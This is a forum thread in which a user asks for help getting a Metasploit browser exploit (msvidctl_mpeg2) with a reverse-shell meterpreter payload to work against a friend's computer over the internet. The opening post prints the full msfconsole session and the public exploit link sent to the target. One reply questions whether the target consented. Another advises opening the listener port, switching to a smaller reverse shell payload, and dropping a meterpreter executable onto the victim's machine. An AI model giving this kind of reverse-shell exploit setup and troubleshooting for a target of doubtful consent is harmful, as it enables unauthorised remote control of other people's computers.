Results 1 to 4 of 4

Thread: Metasploit don't send the exploit !

  1. #1
    vLov3r
    Guest

    Default Metasploit don't send the exploit !

    Hello all..
    I was have a problem with metasploit about SRVHOST and LHOST
    on that link http://forums.remote-exploit.org/new...ost-lhost.html
    I've did what "KrisTeason" said and it worked when I choose windows/execute to run CALC and it worked in my friend pc (outside my local network)
    but when I choose windows/meterpreter/reverse_tcp or windows/shell/reverse_tcp PAYLOADS which makes back connect it failed

    now when I chose SRVPORT 81 and LHOST 4444 ( I have opened 81 port in my router ) and LHOST and SRVHOST 192.168.1.* ( I mean LAN IP )
    and make exploit link like this : http://mywanip:81/
    when my friend opens it from windows/browser/msvidctl_mpeg2 it happens:
    Code:
    msf > use windows/browser/msvidctl_mpeg2
    msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(msvidctl_mpeg2) > show options
    
    Module options:
    
       Name     Current Setting  Required  Description                                          
       ----     ---------------  --------  -----------                                          
       SRVHOST  0.0.0.0          yes       The local host to listen on.                         
       SRVPORT  8080             yes       The local port to listen on.                         
       SSL      false            no        Use SSL                                              
       URIPATH                   no        The URI to use for this exploit (default is random)  
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description                           
       ----      ---------------  --------  -----------                           
       EXITFUNC  process          yes       Exit technique: seh, thread, process  
       LHOST                      yes       The local address                     
       LPORT     4444             yes       The local port                        
    
    
    Exploit target:
    
       Id  Name                                        
       --  ----                                        
       0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0  
    
    
    msf exploit(msvidctl_mpeg2) > set SRVPORT 81
    SRVPORT => 81
    msf exploit(msvidctl_mpeg2) > set URIPATH /
    URIPATH => /
    msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.3
    LHOST => 192.168.1.3
    msf exploit(msvidctl_mpeg2) > exploit[*] Exploit running as background job.
    msf exploit(msvidctl_mpeg2) > [*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:81/[*]  Local IP: http://192.168.1.3:81/[*] Server started.
    So the link which i gave to my friend been : http://41.236.150.12:81/
    When my friend I see that a pc connected and metasploit said "sending exploit" then it's stops , it doesn't connect to the victim computers !!!!!!!!! by way. when i do this in calc executino that worked !


    any solution ?


    thx

  2. #2
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    Ya why not google up on exploits, this isnt like cracking wep, its incredibly complex. There are so many things that could go wrong its pointless for me to even start listing them.

    You might want to try it on a VM, or another pc on your local net before you attempt to infect your "friend" .. which i must say is highly suspicious in the first place.

    Im not sure what your doing wrong but i can tell you it has nothing to do with metasploit, its most definitely user error. If you manage to fix that issue all should be ok
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  3. #3
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    2

    Default

    The most obvious thing I can see is that you haven't opened port 4444 on your router. If that isn't it...

    Just break down your problem. First, I would take the advice of vvpalin and set up a test run on your local network with a "victim" box you can control. VMware is perfect for this. That way you can make sure the victim is running the correct version of Windows XP, the correct version of IE, correct firewall configuration (to allow outbound connections), etc.

    You should also set up an apache server on your box listening on port 81 and port 4444, and see if your friend can view the test page. If they can, they you have indeed configured your router correctly.

    Finally, I'm familiar with this particular exploit. I have had trouble using meterpreter as a payload. I would test this exploit with a more reliable, smaller, payload like a windows command shell (windows/shell_reverse_tcp). If this payload is successful, then you already have control of your victim. In order to start a meterpreter session: use metasploit to generate an executable meterpreter payload, download the executable to your victim's box, set up a listener in metasploit, then run the executable and interact. More info on how to do this can be found by googling "metasploit tips and tricks". Should be the first result.

  4. #4
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    7

    Default

    I have seen Symantec Endpoint protection caught this heap spray attack and just silently drop the connection. your msfconsole will just sit there.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •